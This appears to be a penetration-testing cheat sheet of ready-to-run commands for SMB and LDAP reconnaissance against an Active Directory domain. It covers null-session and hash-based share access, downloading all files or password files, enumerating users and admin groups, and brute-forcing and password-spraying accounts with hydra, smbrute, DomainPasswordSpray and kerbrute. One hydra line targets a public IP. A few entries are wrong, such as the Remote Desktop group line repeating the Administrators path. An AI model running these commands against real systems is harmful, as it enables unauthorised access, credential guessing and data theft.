External Recon
SMB
Ports: 137 (UDP), 139, 445.
Basic SMB enumeration
#Enum4linux
enum4linux -a 10.10.10.19 #Without User
enum4linux -a 10.10.10.19 -u Administrator -p Pass123 #Having user
#Rpcclient
rpcclient -U "" -N 10.10.10.19 #No creds
rpcclient -U Administrator 10.10.10.19 #Asks for password
rpcclient -U Administrator --pw-nt-hash 10.10.10.19 #Asks for NTLM hash
#Nmap
nmap --script smb-enum-users.nse -p139,445 -Pn 10.10.10.19 #Enum SMB users
nmap --script smb-enum-shares.nse -p139,445 -Pn 10.10.10.19 #Enum SMB shares
List shared folders
#Smbclient
smbclient --no-pass -L //10.10.10.19 # Null user
smbclient -U Administrator -L [--pw-nt-hash] //10.10.10.19 #With --pw-nt-hash, the pwd provided is the NTLM hash
#Smbmap
smbmap -u "Administrator" -p "Pass123" -H 10.10.10.19 #Also works with NTLM hash
#Crackmapexec
crackmapexec smb 10.10.10.19 -u '' -p '' --shares #Null user
crackmapexec smb 10.10.10.19 -u 'Adminisatrator' -p 'Pass123' --shares
Connect/mount shared folders
#Connect
smbclient -U Administrator [--pw-nt-hash] //10.10.10.19 #With --pw-nt-hash, the pwd provided is the NTLM hash
#Mount
mount -t cifs -o username=user,password=password //10.10.10.19/share /mnt/share
Download files from shared folders
#Smbmap
smbmap -R Folder -H 10.10.10.19 -A "passwords.txt" -q #Search file in recursive mode and download it
#Smbget
smbget smb://10.10.10.19/Disk$ -R -U "Administrador" #Download all files recursively
#Smbclient
smbclient //10.10.10.19/Disk$
> mask ""
> recurse
> prompt
> mget * #Download everything to current directory
Bruteforce on SMB
#Hydra
hydra -L users.txt -P password.txt 178.255.196.56 smb -V -t 100
#Smbrute (https://github.com/m4ll0k/SMBrute)
python3 smbrute.py -h 10.10.10.19 -U users.txt -P passwords.txt
LDAP
Ports: 389, 636 (SSL), 3268, 3269 (SSL).
Basic LDAP enumeration
#Windapsearch (https://github.com/ropnop/windapsearch)
python windapsearch.py -u Administrator -p Pass123 -d dev.corp --dc-ip 10.10.10.19
#Ad-ldap-enum (https://github.com/CroweCybersecurity/ad-ldap-enum)
python ad-ldap-enum.py -d dev.corp -l 10.10.10.19 -u Administrator -p Pass123
Bruteforce on LDAP
#Password spray (https://github.com/dafthack/DomainPasswordSpray)
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
#Kerbrute (https://github.com/ropnop/kerbrute)
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 10.10.10.19 rockyou.txt Administrator #Password brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 10.10.10.19 users.txt #Username brute
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 10.10.10.19 users.txt rockyou.txt #Password spray
ldapsearch
#Add one of the following options depending on what you want to do
ldapsearch -x -h 10.10.10.19 -D 'dev.corp\Administrator' -w 'Pass123' <OPTION>
#Extract Users
-b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract Computers
-b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract My info
-b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract Domain Admins
-b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract Domain Users
-b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract Enterprise Admins
-b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract Administrators
-b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Extract Remote Desktop Group
-b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"
Last updated